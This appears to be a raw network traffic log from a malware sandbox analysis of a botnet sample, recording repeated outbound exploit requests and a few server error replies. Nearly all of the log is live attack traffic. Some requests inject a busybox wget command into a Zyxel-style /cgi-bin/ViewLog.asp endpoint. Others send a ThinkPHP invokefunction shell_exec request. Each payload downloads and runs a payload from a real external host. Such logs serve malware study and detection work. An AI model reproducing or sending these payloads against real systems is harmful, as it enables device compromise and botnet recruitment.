                                                              Nov 13, 2023 22:20:05.285095930 CET15548OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:09.540492058 CET16055OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:17.731412888 CET17130OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:33.857459068 CET19045OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:06.621068001 CET20702OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              769192.168.2.234742062.29.100.1678080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:01.571984053 CET15019OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              77192.168.2.234262095.86.102.2298080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:20.717453003 CET2653OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              770192.168.2.233564895.82.61.8880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:01.752103090 CET15056OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:03.429335117 CET15301OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:05.413069010 CET15553OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:09.540493011 CET16055OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:17.475543976 CET17041OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:33.345393896 CET19016OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:21:06.621107101 CET20702OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              77185.247.246.1318080192.168.2.2357942
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:02.215310097 CET15144INHTTP/1.1 414 Request-URI Too Large
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              772192.168.2.234031695.217.116.10580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:02.396337986 CET15149OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:02.706048965 CET15185INHTTP/1.1 400 Bad Request
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 681
                                                              date: Mon, 13 Nov 2023 21:20:02 GMT
                                                              server: LiteSpeed
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              773192.168.2.2352636112.83.167.780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:02.437180042 CET15150OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:02.788095951 CET15196INHTTP/1.1 400 Bad Request
                                                              Server: kngx/1.10.2
                                                              Date: Mon, 13 Nov 2023 21:20:02 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 172
                                                              Connection: close
                                                              KS-Deny-Reason: client|156.146.49.168|cdntaizun09-cache29.cdntaizun09.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                              x-link-via: taizun09:80;
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              774192.168.2.2352640112.83.167.780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:02.437577963 CET15151OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:02.788317919 CET15197INHTTP/1.1 400 Bad Request
                                                              Server: kngx/1.10.2
                                                              Date: Mon, 13 Nov 2023 21:20:02 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 172
                                                              Connection: close
                                                              KS-Deny-Reason: client|156.146.49.168|cdntaizun09-cache30.cdntaizun09.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                              x-link-via: taizun09:80;
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              775192.168.2.2352634112.83.167.780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:02.438220024 CET15151OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:02.790445089 CET15198INHTTP/1.1 400 Bad Request
                                                              Server: kngx/1.10.2
                                                              Date: Mon, 13 Nov 2023 21:20:02 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 172
                                                              Connection: close
                                                              KS-Deny-Reason: client|156.146.49.168|cdntaizun09-cache10.cdntaizun09.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                              x-link-via: taizun09:80;
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              776192.168.2.233799231.186.172.1508080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:02.522830009 CET15152OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:02.832366943 CET15260INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:20:02 GMT
                                                              Server: Apache
                                                              Upgrade: h2,h2c
                                                              Connection: Upgrade, close
                                                              Accept-Ranges: bytes
                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: 0
                                                              Content-Type: text/html
                                                              Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20
                                                              Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; }


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              777192.168.2.234847031.40.225.1078080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:02.557162046 CET15153OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:02.899876118 CET15283INHTTP/1.0 400 Bad Request
                                                              Server: squid/3.1.23
                                                              Mime-Version: 1.0
                                                              Date: Mon, 13 Nov 2023 20:51:02 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 3169
                                                              X-Squid-Error: ERR_INVALID_URL 0
                                                              Connection: close
